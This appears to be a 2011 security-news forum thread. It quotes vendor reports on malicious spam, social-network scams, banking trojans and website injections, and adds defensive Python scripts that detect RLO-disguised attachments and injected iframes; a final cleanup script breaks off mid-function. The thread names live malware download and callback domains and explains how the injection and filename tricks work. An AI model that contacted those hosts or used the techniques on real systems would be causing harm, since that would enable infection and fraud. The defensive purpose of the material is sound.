Fake UPS Shipment Arrival E-mail Messages - April 12, 2011 ...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22030


2011-04-14, 17:54

Spamvertised.. campaign serving scareware
- http://ddanchev.blogspot.com/2011/04/spamvertised-reqest-rejected-campaign.html
April 12, 2011 - "A currently spamvertised scareware-serving campaign is enticing end users into downloading and executing a malicious binary, which drops a scareware variant.
Sample subject: Reqest rejected (SP?)
Sample message: "Dear Sirs, Thank you for your letter! Unfortunately we can not confirm your request! More information attached in document below. Thank you Best regards."
Sample attachments: EX-38463.pdf.zip; EX-38463.pdf.exe
Detection rate:
- http://www.virustotal.com/file-scan/report.html?id=c03711dbafae9b296daed8720f997d84caa5e5a5407a689926050a061d67b932-1302746736
File name: EX-38463.pdf.exe
Submission date: 2011-04-14 02:05:36 (UTC)
Current status: finished
Result: 35/41 (85.4%)
... Upon execution downloads hdjfskh .net/ pusk .exe -
Detection rate:
- http://www.virustotal.com/file-scan/report.html?id=c912a975e3c2fc911d6550d86e8fd89dbd30e3d1e07d788b45aac0d6cf61e83c-1302681312
File name: VRB.EXE.Muestra EliStartPage v23.03
Submission date: 2011-04-13 07:55:12 (UTC)
Current status: finished
Result: 19/42 (45.2%)

Phones back..."

(More detail at the ddanchev.blogspot URL above.)


2011-04-15, 20:24

Fraud - intuit TurboTax e-mails...
- http://security.intuit.com/alert.php?a=29
04/15/2011 - "... fraudulent email (copy shown at the URL above)...
What we won't do
- We will -never- send you an email with a "software update" or "software download" attachment.
- We will -never- send you an email asking you for login or password information to be sent to us.
- We will -never- ask you for your banking information or credit card information in an email. We will -never- ask you for confidential information about your employees in an email.
What we'll do
- We will provide you with instructions on how to stay current with your Intuit product, and we will provide you with information on how to securely download an update from your computer.
- If we need you to update your account information, we will request that you do so by logging into your account..."


2011-04-21, 12:59

Facebook scam "My Top 10 stalkers"...
- http://community.websense.com/blogs/securitylabs/archive/2011/04/19/facebook-scam-my-top-10-stalkers-targets-users-in-specific-countries.aspx
19 Apr 2011 - "A new spam campaign, similar to campaigns we have seen in the past, is spreading on Facebook... It works by creating an album - “My Top 10 stalkers” - with the description "Check who views your profile @," followed by a bit.ly URL-shortened link. It then automatically uploads a photo to the app and tries to mark all the user's friends in the photo... The bit.ly link redirects the user to a page that uses JavaScript to determine the geographical location of the computer based on its IP address. Depending on the location, the page then redirects users located in specific targeted countries to the Facebook App in an attempt to further spread the infected link. The campaign is targeted at Facebook users in the United States, Canada, United Kingdom (including a specific target for Great Britain), Saudi Arabia, Norway, Germany, Spain, Slovenia, Ireland, and United Arab Emirates... Regardless of whether the JavaScript redirects the browser to the Facebook app because of its origin, all users are ultimately redirected to a scam page that tries to lure them into completing several fake surveys. Hackers use this method to try to collect personal information such as the user's home address, e-mail address, or phone number... If the user tries to navigate away from the page or close the browser, a message appears asking them to stay and complete a "SPAM-free market research survey to gain access to this special content." Special it may sound, but it is definitely not spam-free! As always, if a page forces you to Like, Share, or install an application in order to view it, DON'T..."
(Screenshots available at the URL above.)


2011-04-23, 14:42

TDL rootkit bypasses security on x64 Vista/Win7
- http://www.informationweek.com/news/security/vulnerabilities/229402086?printer_friendly=this-page
April 22, 2011 - "The malware state of the art continues to improve. In particular, the latest version of the TDL rootkit family - aka Olmarik, TDSS, Alureon - contains sophisticated mechanisms for bypassing security features built into 64-bit versions of Microsoft Windows Vista and Windows 7, and can download additional, standalone malware applications. The fourth version of the TDL malware first appeared* in August 2010 and contained sophisticated new techniques for defeating security measures... TDL4 can "load its kernel-mode driver on systems with an enforced kernel-mode code signing policy," meaning the 64-bit versions of Vista and Windows 7. At that point, the malware can hook directly into the Windows operating system... Since the fourth version of TDL first appeared, it's undergone numerous, incremental revisions. For example, in March 2011, a new version of TDL4 appeared that - after infecting a PC - installs the standalone Glupteba.D malware**, which can then download and execute other pieces of malware... no matter the security defense, such as driver signing, a way to defeat it can be found..."
* http://www.informationweek.com/news/security/vulnerabilities/228300365?printer_friendly=this-page

** http://resources.infosecinstitute.com/tdss4-part-1/
April 19, 2011


2011-04-25, 15:35

Virus Outbreak In Progress...
- http://www.ironport.com/toc/
April 25, 2011

- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d

Fake Microsoft Live Messenger Download Link E-mail Messages - April 25, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23009
Fake Purchase Receipt E-mail Messages - April 25, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23008
Malicious Program Download E-mail Messages - April 25, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23007
Fake Malware Threat Notification E-mail Messages - April 25, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23006
Fake UPS Shipment Error E-mail Messages - April 25, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=19743
Malicious Video Link E-mail Messages - April 25, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=21895

Fake CNO Guidance Attachment E-mail Messages - April 21, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22996
Malicious Photo Attachment E-mail Messages - April 22, 2011 ...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23003


2011-04-28, 17:11

Spamvertised "Successfull Order..." leads to scareware
- http://ddanchev.blogspot.com/2011/04/spamvertised-successfull-order-977132.html
April 28, 2011 - "A currently ongoing malware campaign is impersonating Bobijou Inc for malware-serving purposes.
Sample subject: "Successfull Order 977132"
Sample message: "Thank you for ordering from Bobijou Inc.This message is to inform you that your order has been received and is currently being processed.
Your order reference is 901802. You will need this in all correspondence. This receipt is NOT proof of purchase. We will send a printed invoice by mail to your billing address. You have chosen to pay by credit card. Your card will be charged for the amount of 262.00 USD and “Bobijou Inc”...
Sample attachments: Order_details.zip ...
Detection rates...
* http://www.virustotal.com/file-scan/report.html?id=0bda3bdcffdda0fee31fe35cfea2fb644ff8e549a0a83632faa19cd43e02b904-1303915483
File name: Order details.exe
Submission date: 2011-04-27 14:44:43 (UTC)
Result: 24/40 (60.0%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan/report.html?id=0bda3bdcffdda0fee31fe35cfea2fb644ff8e549a0a83632faa19cd43e02b904-1303987793
File name: 1
Submission date: 2011-04-28 10:49:53 (UTC)
Result: 34/42 (81.0%)

>>> Upon execution phones back to: kkojjors.net/f/g.php -
variantov.com/pusk.exe -
** http://www.virustotal.com/file-scan/report.html?id=ee008f9039534f062bd277860060461064e760bdaa90a36595b9780be54a5a05-1303916125
File name: pusk.exe
Submission date: 2011-04-27 14:55:25 (UTC)
Result: 4/41 (9.8%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan/report.html?id=ee008f9039534f062bd277860060461064e760bdaa90a36595b9780be54a5a05-1303939887
File name: hew.exe.VIR
Submission date: 2011-04-27 21:31:27 (UTC)
Result: 11/41 (26.8%)


2011-04-29, 14:13

Malicious SPAM on the rise...
- http://labs.m86security.com/2011/04/malicious-spam-on-the-increase-again/
April 29, 2011 - "... our stats show the bot herders are gearing up again with the proportion of spam with malware attachments rising*, although still not as high as the peaks we saw mid last year... After the bot herders took a brief Easter break, they are back to sending new waves of malicious spam. The first spam campaign was sent by the Cutwail botnet earlier this week. The email claims to be an invoice from Bobijou Inc. – an online jewellery brand. There is a chance that people might fall into this trap especially as it claims money on your credit card was involved. But take a closer look at the subject line: Successfull Order 3677718, that wrong spelling should easily alert you that this email is a scam... Another malicious spam campaign originating from the Donbot botnet came in later this week. It uses a common, uncreative theme with subject lines like, “my hot pic : )“, “my naked pic is attached“, etc. The Donbot botnet’s spam output is on the rise and this is the first time we have seen it spreading malicious attachments... In addition, this week we have been seeing more of the Asprox botnet’s “Spam from your Facebook account” campaign, that preys on people's fears about the security of their Facebook accounts. This campaign first came out last year, illustrating that the bot herders behind Asprox often cycle their spam campaigns between UPS, DHL, FEDEX and iTunes Gift Certificate among others... The attachment is a Trojan that aims to seed the Asprox bot executable in the infected host, which is then used for spamming purposes..."
* http://labs.m86security.com/wp-content/uploads/2011/04/maliciousSpam.png


2011-05-02, 08:31

Facebook Scam... leads to Adware
- http://labs.m86security.com/2011/05/facebook-scam-wired-news-iphone-5-first-exposure-leads-to-adware/
May 1, 2011 - "... we observed a new type of scam, this one leveraging Facebook’s new social plugin for websites that allow for comments. This is being exploited by scammers to get their rogue websites visible on users’ news feeds... There are various flavors of the scam making the rounds. However, the newest one to make the rounds focuses on a familiar Apple product: the iPhone. With rumors circulating about the iPhone 5, loyal Apple followers are drawn to the various news articles that cover these stories... The report claims to be from Wired News and has one of those headlines that is used to lure a user into clicking on the link... Once a user clicks on the link, they are -redirected- to a random .info site. There have been over 10 of these in circulation for this particular scam. Before the user can click on anything, they are asked to answer a CAPTCHA-like verification form... Unlike most Facebook scams of late, at the end of this rainbow, there is no survey scam. Instead, the users are prompted to download an executable file. The executable file is videogameboxinstaller.exe and it is dubious in nature, as it downloads other pieces of software... PageRage notes in its terms above that it will display ads to the end user. Sounds like Adware? Four antivirus vendors agree*, flagging this as Adware.Yontoo... "
* http://www.virustotal.com/file-scan/report.html?id=e22484a77d66ca31a12af56fe9dcebdab63c7fbf92ba92e6c1e49a877c462b4a-1304294930
File name: pagerage.exe
Submission date: 2011-05-02 00:08:50 (UTC)
Result: 4/41 (9.8%)


2011-05-03, 20:57

Goal.com serving malware
- http://blog.armorize.com/2011/05/goalcom-serving-malware.html
5.02.2011 - "Goal.com receives 232,116 unique visitors per day according to compete.com, 215,989 according to checksitetraffic.com, and ranks 379 globally on alexa.com. Recently, between April 27th and 28th, it was detected by HackAlert to be actively serving malware (drive-by downloads). From what we've observed, we believe the attacker has a way into goal.com's system and was only testing during this time. This is our technical report.
A. From what we've collected, parts of goal.com seem to have been compromised allowing the attacker to manipulate content at will. A backdoor may exist to allow the attacker continuous control of goal.com's content.
B. During this time we've observed different malicious scripts injected into goal.com, leading us to believe that this isn't a one-time mass SQL injection attempt. We've also not found the injected content to appear in other websites.
C. The malicious domains include:
1. pxcz .cz .cc, which is neither being flagged by any antivirus blacklist nor by Google SafeBrowsing.
2. opofy7puti .cz .cc, which is neither being flagged by any antivirus blacklist nor by Google SafeBrowsing.
3. justatest .cz .cc, which is neither being flagged by any antivirus blacklist nor by Google SafeBrowsing.
> This further suggests that this is an attack targeted at goal.com
D. Duration was between April 27th and 28th. The attacker seemed to be testing their injections and was picked up by our scanners.
E. Browser exploits used during this "test-drive" included: CVE-2010-1423 (Java), CVE-2010-1885 (MS help center HCP), CVE-2009-0927 (PDF), and CVE-2006-0003 (MS MDAC).
F. The g01pack exploit pack was being used. It includes a fake admin page which is used as a honeynet for security researchers--to allow the attacker to observe who is studying their malicious domains.
G. The exploit codes were well mutated. We don't mean well "obfuscated," because in addition to obfuscation, the primitive form of the exploit itself has been mutated well so as to avoid detection.
H. Malware served was packed with UPX and modifies setupapi.dll and sfcfiles.dat. When we first submitted it to VirusTotal, 4 out of 41 antivirus vendors were able to flag it.
I. The malware connects to the following domains:
1. testurl .ipq .co:80 (in UK), which again, is neither flagged by any antivirus blacklist nor by Google SafeBrowsing
2. :80 (US), which reverses back to coldgold .co .uk, and which again, isn't blacklisted by any, including Google SafeBrowsing.
3. banderlog .org, not flagged by antivirus / Google SafeBrowsing, but has some records on clean-mx.de..."

(More detail and screenshots available at the blog.armorize URL above.)


2011-05-05, 15:43

Osama alive scam - Twitter
- http://www.theregister.co.uk/2011/05/24/osama_alive_twitter_scam/
24 May 2011

Osama RTF Exploit
- http://www.f-secure.com/weblog/archives/00002154.html
May 5, 2011
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3333
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3334
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3335
CVSS v2 Base Score: 9.3 (HIGH)
- http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx
• V2.1 (April 12, 2011): Announced that the security update for Microsoft Office 2004 for Mac (KB2505924) offered in MS11-021, MS11-022, and MS11-023 also addresses the vulnerabilities described in this security bulletin.
- http://www.microsoft.com/technet/security/Bulletin/MS11-021.mspx
> CVE-2011-0097, CVE-2011-0098, CVE-2011-0101, CVE-2011-0103, CVE-2011-0104, CVE-2011-0105, CVE-2011-0978, CVE-2011-0979, CVE-2011-0980
- http://www.microsoft.com/technet/security/Bulletin/MS11-022.mspx
> CVE-2011-0655
- http://www.microsoft.com/technet/security/Bulletin/MS11-023.mspx
> CVE-2011-0107, CVE-2011-0977

SPAM - Osama dead pics
- http://www.symantec.com/connect/blogs/malware-and-phishing-attacks-flourish-following-news-osama-s-death
3 May 2011 - "The first spam using the news of Osama Bin Laden’s death was seen in the wild within three hours of the event—Symantec reported this spam activity along with other spam samples in a blog entitled “Osama Dead” is No Longer a Hoax. As anticipated, we started observing a rise in malicious and phishing attacks... The links in this spam email dump Downloader onto the victim’s machine, which in turn downloads the actual malware. Further analysis of these attacks shows that most of the malicious attacks have originated from Brazil, Europe, and the U.S... Spammers are making an effort to not only push the messages into users’ inboxes, but also getting them to open and install the executable payload... The phishing site shows an auto-running Bin Laden related video in an iframe and asks the user to click on a link to download a “complete” video. Clicking on that link forces the download of an .exe file..."

- http://community.websense.com/blogs/securitylabs/archive/2011/05/04/the-quot-real-quot-osama-bin-laden-dead-pics.aspx
04 May 2011 03:26 PM - "Messages inviting users to see the "real photos" of Osama Bin Laden's remains made the rounds in the email realm today, in addition to the Facebook scams and malware recently spread via Twitter abusing the same topic... Clicking on the provided link prompts the user to download a file called FOTOS.Terroris.zip, which is fairly detected by AV engines*."
* http://www.virustotal.com/file-scan/report.html?id=7fd720ada48132d4f93cfea23947ce40043f72c12ec0da4697dd162f86b16b1a-1304596429
File name: Fotos.exe.vir
Submission date: 2011-05-05 11:53:49 (UTC)
Result: 30/42 (71.4%)

- http://www.us-cert.gov/current/#osama_bin_laden_s_death
May 2, 2011

Osama malware scams spread to Facebook
- http://www.theregister.co.uk/2011/05/03/osama_malware_scams/
3 May 2011


2011-05-05, 16:33

Goal.com serving malware - updated...
- http://blog.armorize.com/2011/05/goalcom-serving-malware.html
Updates - "... The chain of infection is:
1. goal .com, includes iframe to pxcz .cz .cc
2. pxcz.cz.cc iframes to justatest .cz .cc
3. justatest .cz .cc runs the exploit pack g01pack, serves exploits based on visitor's browser type
4. exploit compromises browser, downloads malware from justatest .cz .cc
5. malware links to testurl .ipq .co (UK), :80 (US, coldgold .co .uk), and banderlog .org...
> A unique feature of this exploit pack is the inclusion of a fake admin / stats page. This page supports common id / password combinations like admin / admin to trick security researchers into believing that they've obtained access to the exploit pack's admin page... Once logged in, the researcher is presented with a fake infection stats page. In reality, this allows the attacker to gain insights into who has identified the malicious domain, and is conducting investigation...
The exploit codes were well mutated. We don't mean well "obfuscated," because in addition to obfuscation, the primitive form of the exploit itself has been mutated well so as to avoid detection..."

Goal.com spreading malware again: "Security Shield" fake anti-virus
- http://blog.armorize.com/2011/05/goalcom-spreading-malware-again.html


2011-05-11, 18:21

New bank trojan - "Sunspot"...
- http://www.trusteer.com/blog/windows-malware-morphs-financial-fraud-platform
11 May 2011 - "... identified a little known Windows malware platform that has been in circulation for some time, but was never previously recognized for its financial fraud capabilities. We named it Sunspot. It is currently targeting North American financial institutions and has already achieved SpyEye and Zeus–like infection rates in some regions. There are confirmed fraud losses associated with Sunspot, so the threat is real... In addition to Sunspot, Trusteer alone also has discovered several malware platforms over the past 18 months including Silon, OddJob and several others. Sunspot targets 32-bit and 64-bit Windows platforms from Windows XP through Windows 7, and is capable of installing in non-administrator and administrator accounts. Once installed, it targets Internet Explorer and Firefox browsers. This is a very modern malware platform with sophisticated fraud capabilities... According to a Virus Total analysis, only nine of 42 anti-virus programs tested, or 21%, currently detect Sunspot. It can carry out man-in-the-browser attacks including web injections, page grabbing, key-logging and screen shooting (which captures screenshots of the mouse vicinity as a user types his/her password on a virtual keyboard)... We traced the Sunspot Command and Control Server (C&C) hostname to a domain registered in Russia. Once installed, Sunspot is started either by "rundll32.exe" via HKCU\Software\Microsoft\Windows\CurrentVersion\Run or via HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components. It uses CBT hooking to load its DLL into the browser (Internet Explorer/Firefox). Inside the browser it hooks several Wininet/NSPR4/user32 functions for web injections, page grabbing and key-logging... The takeaway for financial institutions from Sunspot remains the same. A layered security approach that combines server-side and client-side zero day attack protection is the most effective way to protect users against crimeware, since anti-virus programs are lagging way behind in their ability to detect these programs."


2011-05-12, 14:14

Multiple Facebook scams...
- http://www.theregister.co.uk/2011/05/12/facebook_spam_prevention_scam/
12 May 2011 - "... junk messages on Facebook is being used to bait a new scam doing the rounds on the social network. Prospective marks in receipt of the fraudulent messages are invited to "verify" their account in order to "prevent spam". Recipients who respond to the message by clicking on a link end up sharing it on their wall as well as spreading highly obfuscated JavaScript... A full write-up of the scam, including images of the offending messaging, can be found in a blog post by Sophos here*..."
* http://nakedsecurity.sophos.com/2011/05/12/preventing-spam-scam-on-facebook-does-exactly-the-opposite
May 12, 2011

- http://www.f-secure.com/weblog/archives/00002157.html
May 12, 2011

- http://isc.sans.edu/diary.html?storyid=10870
Last Updated: 2011-05-12 08:38:17 UTC
- http://blog.trendmicro.com/dubious-javascript-code-found-in-facebook-application/


2011-05-13, 16:14

Win7/Vista e-mail malware - unicode tricks...
- http://www.theinquirer.net/inquirer/news/2070768/windows-malware-camouflaged-unicode-filename-trickery
May 13 2011 - "... Windows PC users have been warned about malware Trojans that camouflage malicious executable files using a fancy unicode trick*. Unicode is a computing industry standard that provides a unique number for every character you use, no matter what system you are using. With malicious trickery, criminals have worked out how to fiddle with unicode so that some characters in a Windows filename can be reversed. Security firm Norman* found malicious email attachments that appeared on the surface to have filenames with standard alphabetical characters, with unicode-capable viewers seeing nothing out of the ordinary. However, if you look at the file from a command prompt, it shows that the last bit of the filename has actually been reversed, and that this seemingly innocuous emailed file is actually an executable.
Norman tested other filenames, and found that the same unicode trick allowed files to hide the fact that they were executable in the email client Lotus Notes. The firm said that any filename could hide extensions like PDF and EXE using the trick.
The firm said that the issue only affects Windows Vista and Windows 7 users, as Windows XP users have to install support for right-to-left languages in order to be vulnerable..."
* http://norman.com/security_center/security_center_archive/2011/rtlo_unicode_hole
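Added example (not from the Norman or Inquirer write-ups above): a small Python check that a mail gateway or analyst could run over attachment names to catch the right-to-left-override trick described in the post. It flags any Unicode bidi control character in a filename (there is no legitimate reason for one), shows an approximation of how a Unicode-aware viewer would render the name when a single U+202E is present (everything after the override is drawn reversed; the full bidi algorithm is more involved), and reports the real extension. The sample names are constructed for the demonstration.

```python
from dataclasses import dataclass

# Unicode bidirectional control characters that can reorder how a filename is drawn.
# U+202E (RLO) is the one used by the attachments described in the post.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF",
    "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
    "\u200e": "LRM", "\u200f": "RLM",
}

# Extensions that Windows will execute when double-clicked (illustrative list).
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd",
                         ".js", ".vbs", ".msi", ".hta"}


@dataclass
class AttachmentVerdict:
    raw_name: str           # the name exactly as it arrived, controls included
    apparent_name: str      # approximate rendering a Unicode-aware viewer shows
    true_extension: str     # the suffix the OS actually uses to pick a handler
    bidi_controls: list     # names of the bidi controls found, in order
    hidden_executable: bool # executable whose displayed name hides that fact
    suspicious: bool


def strip_bidi(name: str) -> str:
    """Remove all bidi control characters (what the OS sees as the filename)."""
    return "".join(c for c in name if c not in BIDI_CONTROLS)


def apparent_display(name: str) -> str:
    """Approximate the visual rendering for the single-RLO case: text before the
    override is drawn as-is, text after it is drawn right-to-left (reversed)."""
    idx = name.find("\u202e")
    if idx == -1:
        return strip_bidi(name)
    head, tail = name[:idx], name[idx + 1:]
    return strip_bidi(head) + strip_bidi(tail)[::-1]


def true_extension(name: str) -> str:
    cleaned = strip_bidi(name)
    dot = cleaned.rfind(".")
    return cleaned[dot:].lower() if dot != -1 else ""


def inspect_attachment(name: str) -> AttachmentVerdict:
    found = [BIDI_CONTROLS[c] for c in name if c in BIDI_CONTROLS]
    apparent = apparent_display(name)
    ext = true_extension(name)
    # The executable nature is hidden when the real extension is executable but the
    # displayed name does not end with it.
    hidden = ext in EXECUTABLE_EXTENSIONS and not apparent.lower().endswith(ext)
    return AttachmentVerdict(name, apparent, ext, found, hidden,
                             suspicious=bool(found) or hidden)


def scan_attachments(names) -> list:
    """Return the raw names of every attachment that should be held for review."""
    return [n for n in names if inspect_attachment(n).suspicious]


if __name__ == "__main__":
    # Constructed samples: a normal PDF and an executable dressed up with RLO.
    samples = ["report.pdf", "invoice_\u202efdp.exe"]
    for n in samples:
        v = inspect_attachment(n)
        print(repr(v.apparent_name), "->", v.true_extension, v.bidi_controls, v.suspicious)
```

Running it on the constructed samples, the second name is shown to the user as `invoice_exe.pdf` while the OS sees a `.exe`; the check reports the `RLO` control and flags it. Stripping the control characters (or rejecting the attachment outright) is the corresponding mitigation at the gateway.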


2011-05-17, 13:40

Geek.com hacked with an exploit kit
- http://research.zscaler.com/2011/05/geekcom-hacked-with-exploit-kit.html
May 15, 2011 - "... The attack vector remains the same, namely injecting a malicious HTML Iframe or script tag into the legitimate pages... the malicious Iframe is injected at the bottom of the page... -redirects- victims to a malicious website hosting an exploit kit. Once you visit, heavily obfuscated JavaScript is returned which will target various known vulnerabilities..."
(Screenshots and more detail available at the URL above.)

- http://www.theregister.co.uk/2011/05/17/geek_dot_com_infected/
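Added example (not from Zscaler's or Armorize's reports): a Python scanner for the injection pattern both the Goal.com and Geek.com posts describe, an iframe or script tag pointing off-site, often sized to zero or hidden, and appended after the page's real closing tag. It uses only the standard library's html.parser, and the sample page and the `injected.example` domain are constructed for the demonstration; a site owner would run it over pages fetched from their own server and compare against a known-good copy.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline styles that make an element invisible to the visitor.
HIDDEN_STYLE = re.compile(r"(display\s*:\s*none|visibility\s*:\s*hidden)", re.I)


class _Collector(HTMLParser):
    """Collect iframe/script start tags with their positions, plus where </html> is."""
    def __init__(self):
        super().__init__()
        self.found = []        # (tag, attrs dict, (line, col))
        self.html_end = None   # position of the first </html>, if present

    def handle_starttag(self, tag, attrs):
        if tag in ("iframe", "script"):
            self.found.append((tag, dict(attrs), self.getpos()))

    def handle_endtag(self, tag):
        if tag == "html" and self.html_end is None:
            self.html_end = self.getpos()


def _is_hidden(attrs) -> bool:
    if HIDDEN_STYLE.search(attrs.get("style", "")):
        return True
    try:
        width = int(attrs.get("width", "100"))
        height = int(attrs.get("height", "100"))
    except ValueError:            # percentages etc.; treat as visible
        return False
    return width <= 1 or height <= 1


def _same_site(host: str, site_host: str) -> bool:
    return host == site_host or host.endswith("." + site_host)


def find_injected_frames(html: str, site_host: str) -> list:
    """Return iframe/script tags with a src that looks injected, each with its reasons:
    'offsite' (host outside site_host), 'hidden' (zero-size or CSS-hidden iframe),
    'after_html' (tag appears after the closing </html>, typical of appended injections)."""
    parser = _Collector()
    parser.feed(html)
    parser.close()
    findings = []
    for tag, attrs, pos in parser.found:
        src = attrs.get("src")
        if not src:
            continue
        reasons = []
        host = urlparse(src).hostname
        if host and not _same_site(host, site_host):
            reasons.append("offsite")
        if tag == "iframe" and _is_hidden(attrs):
            reasons.append("hidden")
        if parser.html_end is not None and pos > parser.html_end:
            reasons.append("after_html")
        if reasons:
            findings.append({"tag": tag, "src": src, "line": pos[0], "reasons": reasons})
    return findings


# Constructed sample: a legitimate page with an appended, hidden, off-site iframe.
SAMPLE_PAGE = """<html><head><title>Match report</title>
<script src="/static/app.js"></script></head>
<body><p>Match report...</p>
<iframe src="https://player.goal.example/embed" width="640" height="360"></iframe>
</body></html>
<iframe src="http://injected.example/in.php" width="0" height="0" style="display:none"></iframe>
"""

if __name__ == "__main__":
    for f in find_injected_frames(SAMPLE_PAGE, "goal.example"):
        print(f"line {f['line']}: <{f['tag']} src={f['src']}> {', '.join(f['reasons'])}")
```

On the sample, the player iframe on a subdomain of the site passes, while the appended frame is reported with all three reasons. Any single reason deserves a look; all three together on a page that did not have the tag yesterday is the Goal.com pattern, and the right response is to pull the page and look for how the content was modified rather than only removing the tag.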


2011-05-18, 19:22

Criminals trading in Twitter ...
- http://www.f-secure.com/weblog/archives/00002159.html
May 18, 2011 - "Surely nobody would sell stolen credit cards on Twitter? Except they do... he seems to sell credit card info, most likely collected with keyloggers from infected home computers. The prices of stolen credit cards range from $2 to $20, depending on the country where they were stolen from... if you'd rather not use stolen credit cards yourself, you can have him buy you iPhones, iPads and laptops with stolen credit cards and ship them to you. In practice, the thief will log into an online store, then purchase an iPad as a gift purchase, giving your address as the delivery address and paying for the goods with a stolen credit card. An iPad bought like this goes for $150... But keyloggers collect more than credit cards. They also record passwords when you log into online services. So this vendor is also selling access to other people's online bank accounts. An account with a balance of $28,000 sells for $1,000... to prove he really has the goods, the vendor posts "demo" information. Which basically is personal information of a handful of victims, including names, home addresses, credit card numbers and passwords...
The accounts shown above* have been reported to relevant authorities."
* (Screenshots and more detail at the f-secure URL above.)


2011-05-18, 23:46

Fraudsters suck $1.4 Billion from Airlines
- http://www.securityweek.com/fraudsters-suck-14-billion-airlines
May 18, 2011 - "According to recent survey findings coming from CyberSource*, a Visa company, airlines lost an estimated $1.4 billion due to online payment fraud in 2010. But with so many security checks that come along with air travel, how is this possible? A typical fraud scenario in the airline industry plays out like this:
1. A fraudster illegally obtains credit card data;
2. The fraudster obtains the name, address, and other appropriate information for a genuine customer interested in buying "discount" tickets;
3. The fraudster buys the ticket in the innocent person's name, using the stolen credit card number;
4. The fraudster delivers the ticket to the customer and receives payment, typically in cash..."
* http://www.cybersource.com/news_and_events/view.php?page_id=1900
May 18, 2011

... Meanwhile, the TSA "security" groping and fondling continues...


2011-05-19, 15:01

SpyEye attack on Verizon...
- http://www.trusteer.com/blog/spyeye-attack-verizon-exposes-pci-shortcomings
May 18, 2011 - "We recently discovered a configuration of the SpyEye Trojan targeting Verizon’s online billing page and attempting to steal payment card information. The attack took place between May 7th and 13th. SpyEye uses a technique called “HTML injection” to modify the pages presented in the victim’s browser, in this particular case the injected HTML is used to capture the following credit card related data. The attack is transparent to Verizon customers since the malware waits for the user to logon and access their billing page and only then injects an authentic-looking replica webpage that requests this information. Since the user has logged on and has navigated to the familiar billing page they have no reason to suspect this request for payment information is fraudulent... it continues a financial malware trend we have been tracking in recent weeks: a shift away from stealing usernames and passwords to stealing payment and credit card data... this practice allows criminals to commit card-not-present fraud on the Internet, and also makes it more difficult for banks to identify the source of fraudulent transactions since they cannot be traced back to a specific computer. Whether it’s on consumer machines, call center computers, or point of sale systems, attackers are targeting endpoints to steal readily available payment card data. This trend is exposing a major shortcoming in the Payment Card Industry Data Security Standard (PCI-DSS), which only requires endpoints to be running anti-virus software. As we have seen, anti-virus software is unable to effectively defend against zero day attacks..."
(More detail available at the trusteer URL above.)


2011-05-20, 11:50

Fake Apple store order notifications...
- http://community.websense.com/blogs/securitylabs/archive/2011/05/19/an-apple-a-day-promotes-wikipharmacy.aspx
19 May 2011 - "Fake Apple Store Order Notifications have been making rounds for months now. The volume of this particular spam campaign is not as astonishing as other past campaigns. It is actually the exact opposite of those massive outbreaks that distribute hundreds of thousands of spam emails for a few hours and suddenly -stop- the next day. Typically, the email contains a link that -redirects- users to a very familiar pharmacy spam site. These links either belong to compromised sites or newly registered domains... Today, we noticed the same fake Apple Store email redirecting users to a different, relatively new pharmacy spam web template. The new template channels a wikipedia feel to it and is cleverly titled "WikiPharmacy". Looking deeper into the IP where this domain is hosted, we learned that it caters to over 24,000 other domains. These domains were all used in pharmacy spam campaigns at one point."
(Screenshots available at the websense URL above.)

- http://sunbeltblog.blogspot.com/2011/05/dear-apple-store-customer.html
May 20, 2011


2011-05-20, 16:40

PHP file injections - osCommerce malware: Cannot redeclare corelibrarieshandler
- http://blog.sucuri.net/2011/05/oscommerce-malware-cannot-redeclare-corelibrarieshandler.html
May 19, 2011 - "...for the last few days we started to see many of those osCommerce sites that were hacked, generating errors when trying to access them:
... Fatal error: Cannot redeclare corelibrarieshandler() ..
And according to Google, there are probably about 10k pages with this type of error. So what is going on? It seems that the attackers tried to inject more -malware- into sites, but made a mistake... at the top of every PHP file... Which instead of doing what they planned, caused all the sites to fail with this error “Fatal error: Cannot redeclare corelibrarieshandler() (previously declared in…”. Very annoying for both sides involved. To clean it up, you have to remove that piece of code from the top of every PHP file and properly secure osCommerce..."
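Added here as a worked example, not code from Sucuri or from osCommerce: a Python script for the cleanup the post describes. It looks for the symptom rather than a fixed signature: the same function declared in more than one PHP file, which is exactly what makes PHP abort with "Cannot redeclare" once one file includes another. The sample files are constructed, and the injected function body is a harmless placeholder standing in for whatever the attackers pasted.

```python
"""Find a function declared in many PHP files and strip the identical copies
(added example; SAMPLE_FILES is a constructed stand-in for a site tree)."""
import re
from collections import defaultdict
from pathlib import Path

FUNC_DECL = re.compile(r"\bfunction\s+([A-Za-z_]\w*)\s*\(")

# Constructed sample: two files carry the same block prepended before their
# original <?php tag; the body is a placeholder, not any real payload.
INJECTED = ("<?php function corelibrarieshandler() { $s = '{'; "
            "/* constructed placeholder body */ return $s; } ?>\n")
SAMPLE_FILES = {
    "index.php": INJECTED + "<?php\nrequire('includes/application_top.php');\n?>\n",
    "includes/application_top.php": INJECTED + "<?php\n$x = 'a {fake} brace in a string';\n",
    "includes/functions/html_output.php":
        "<?php\nfunction tep_href_link($page) { return $page; }\n",
}


def load_php_tree(root):
    """Read every .php file under root into {relative path: source}."""
    root = Path(root)
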